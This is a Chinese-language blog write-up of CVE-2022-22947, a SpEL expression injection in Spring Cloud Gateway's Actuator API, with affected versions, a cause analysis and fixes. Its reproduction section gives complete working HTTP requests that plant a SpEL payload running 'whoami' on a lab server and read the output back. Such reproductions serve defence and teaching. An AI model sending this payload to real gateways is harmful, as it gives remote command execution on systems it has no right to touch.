Spring Cloud Gateway RCE

2023-04-28 23:46 由灿灿灿灿灿发表于 #其他

Spring Cloud Gateway RCE

Spring Cloud Gateway RCE

一、基本介绍

CVE编号：CVE-2022-22947

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（包含）以前存在一处SpEL表达式注入漏洞，当攻击者可以访问Actuator API的情况下，将可以利用该漏洞执行任意命令。

Spring Cloud Gateway：

是Spring Cloud微服务的一个网关组件。

1、路由（Route）

2、断言（Predicate）

3、过滤器（Filter）

Spring Boot Actuator：

是Spring Boot框架中的一个监控组件。

Gateway配置可以使用两种方式：

1、通过yml或者properties固定配置

2、通过actuator接口动态配置

Actuator操作Gateway接口列表：

id	HTTP Method	描述
globalfilters	GET	返回全局Filter列表
routefilters	GET	每个路由的Filter
routes	GET	路由列表
routes/[id]	GET	指定路由的信息
routes/[id]	POST	创建路由
refresh	POST	刷新路由缓存
routes/[id]	DELETE	删除路由

二、漏洞复现

版本要求：

Spring Cloud Gateway 3.1.x < 3.1.1

Spring Cloud Gateway 3.0.x < 3.0.7

过程：

1、启动Spring Cloud Gateway服务

2、添加过滤器（POST）

POST /actuator/gateway/routes/hacker HTTP/1.1
Host: 192.168.142.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 331
Content-Type: application/json

{
  "id": "hacker",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

3、刷新过滤器（POST）

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.142.133:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

4、访问过滤器ID（GET）

http://192.168.142.133:8080/actuator/gateway/routes/hacker

Result中有命令执行返回的信息。

三、原理分析

1、开启Acutator，可以通过接口列出路由（包括过滤器），如：actuator/gateway/routes

2、可以通过/actuator/gateway/routes/{id}创建路由

3、通过/actuator/gateway/reflesh刷新路由

4、当路由带有恶意的Filter，里面的spEL表达式会被执行

个人理解：

Spring Cloud GatewayRCE漏洞主要是使用了Actuator接口对Gateway动态配置，而且Actuator接口可以被其他人访问，可以创建Gateway中的路由规则，攻击者对Filter中写入恶意spEL表达式，服务器会去解析spEL表达式，造成命令执行。

四、修复方法

1、更新升级Spring Cloud Gateway版本

2、在不考虑影响业务的情况下禁用actuator接口

management.endpoint.gateway.enable=false

热门相关：骑士归来战神横行霸道重生之至尊千金最强装逼打脸系统